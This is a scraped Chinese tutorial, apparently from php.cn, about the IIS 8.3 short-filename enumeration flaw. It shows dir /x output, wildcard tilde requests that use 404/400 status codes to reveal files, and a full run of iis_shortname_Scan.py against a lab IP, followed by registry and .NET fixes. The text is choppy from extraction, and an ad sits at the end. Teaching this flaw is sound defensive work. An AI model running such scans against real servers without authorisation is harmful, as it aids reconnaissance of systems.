网络安全/渗透测试/代码审计/
关注
IIS - 短文件名猜解漏洞
短文件名介绍为了兼容
16
MS-DOS
Windows 8.3
首先在C盘下多创建几个文件:(有不同的后缀名,都是比较长的文件名)
代码语言:javascript代码运行次数:0运行复制<pre class="brush:php;toolbar:false;">aaaaaaaaaaaa.txtbbbbbbbbbbbb.aspabcdefghijk.txtabcdefghig.php
打开
命令提示符
C盘
dir /x
<pre class="brush:php;toolbar:false;">C:\>dir /x 驱动器 C 中的卷没有标签。 卷的序列号是 509E-D608 C:\ 的目录2019-08-02 12:37 0 AAAAAA~1.TXT aaaaaaaaaaaaa.txt2019-08-02 12:47 0 abc.txt2019-08-02 12:39 0 ABCDEF~1.PHP abcdefghig.php2019-08-02 12:39 0 ABCDEF~1.TXT abcdefghijk.txt2019-07-23 11:47 0 AUTOEXEC.BAT2019-08-02 12:37 0 BBBBBB~1.ASP bbbbbbbbbbbbbb.aspx2019-07-23 11:47 0 CONFIG.SYS2019-07-23 11:49 <DIR> DOCUME~1 Documents and Settings2019-07-23 11:59 <DIR> FPSE_S~1 FPSE_search2019-07-23 11:59 <DIR> Inetpub2019-07-23 11:51 <DIR> PROGRA~1 Program Files2019-07-23 13:17 <DIR> WINDOWS2019-07-23 11:47 <DIR> wmpub 7 个文件 0 字节 6 个目录 28,107,870,208 可用字节C:\>
可以看到我们第一个文件:
aaaaaaaaaaaaa.txt
AAAAAA~1.TXT
abcdefghig.php
ABCDEF~1.PHP
后面的也一样,只保留前
六位数
文件名
~
1.后缀名
这时候,我们再创建一个文件:
abc.txt
dir /x
可以看到,前面并没有短文件名,因为它本身长度就不是特别的长!
从以上实验得出短文件名的特征:
短文件名特征1、只有
前六位
~1
1
2、后缀名最长只有
3
3、所有
小写字母
大写字母
4、长文件名中含有多个
.
.
5、长文件名前缀/文件夹名字符长度符合
0-9
Aa-Zz
大于等于9位
攻击者使用通配符
*
?
IIS
~
HTTP状态码
存在
404
不存在
400
因为我开着
IIS
192.168.119.133
/a*~1*/
首字母a
a
存在
~1
如果说这个页面返回的状态码是
404
存在
400
不存在
从上图可以得出,返回的页面状态码是
404
a
aspnet_client
IIS
这个时候我们测试一个不存在的文件或者文件名:
访问URL:
返回的状态码是
400
不存在
c
用到的工具来自
Github
<pre class="brush:php;toolbar:false;">用法是:iis_shortname_Scan.py 目标主机python iis_shortname_Scan.py http://192.168.119.133
用之前,我们先把刚刚创建的那些文件复制到我们的网站更目录,然后再使用:
<pre class="brush:php;toolbar:false;">E:\HACK\IIS短文件名猜解工具\IIS_shortname_Scanner>python iis_shortname_Scan.py http://192.168.119.133Server is vulnerable, please wait, scanning...[+] /a~1.* [scan in progress][+] /b~1.* [scan in progress][+] /ab~1.* [scan in progress][+] /aa~1.* [scan in progress][+] /bb~1.* [scan in progress][+] /as~1.* [scan in progress][+] /abc~1.* [scan in progress][+] /aaa~1.* [scan in progress][+] /bbb~1.* [scan in progress][+] /asp~1.* [scan in progress][+] /abcd~1.* [scan in progress][+] /aaaa~1.* [scan in progress][+] /bbbb~1.* [scan in progress][+] /aspn~1.* [scan in progress][+] /abcde~1.* [scan in progress][+] /aaaaa~1.* [scan in progress][+] /bbbbb~1.* [scan in progress][+] /aspne~1.* [scan in progress][+] /abcdef~1.* [scan in progress][+] /aaaaaa~1.* [scan in progress][+] /bbbbbb~1.* [scan in progress][+] /aspnet~1.* [scan in progress][+] /abcdef~1.p* [scan in progress][+] /abcdef~1.t* [scan in progress][+] /aaaaaa~1.t* [scan in progress][+] /bbbbbb~1.a* [scan in progress][+] /aspnet~1 [scan in progress][+] Directory /aspnet~1 [Done][+] /abcdef~1.ph* [scan in progress][+] /abcdef~1.tx* [scan in progress][+] /aaaaaa~1.tx* [scan in progress][+] /bbbbbb~1.as* [scan in progress][+] /abcdef~1.php* [scan in progress][+] File /abcdef~1.php* [Done][+] /abcdef~1.txt* [scan in progress][+] File /abcdef~1.txt* [Done][+] /aaaaaa~1.txt* [scan in progress][+] File /aaaaaa~1.txt* [Done][+] /bbbbbb~1.asp* [scan in progress][+] File /bbbbbb~1.asp* [Done]----------------------------------------------------------------Dir: /aspnet~1File: /abcdef~1.php*File: /abcdef~1.txt*File: /aaaaaa~1.txt*File: /bbbbbb~1.asp*----------------------------------------------------------------1 Directories, 4 Files found in totalNote that * is a wildcard, matches any character zero or more times.
可以从上图中对照一下看看,成功猜解出我们网站更目录下的短文件名!
漏洞修复1、升级
.net framework
2、修改注册表键值:
修改
NtfsDisable8dot3NameCreation
1
1
以上就是IIS - 短文件名猜解漏洞的详细内容,更多请关注php中文网其它相关文章!
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
广告
收藏
收藏
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
868
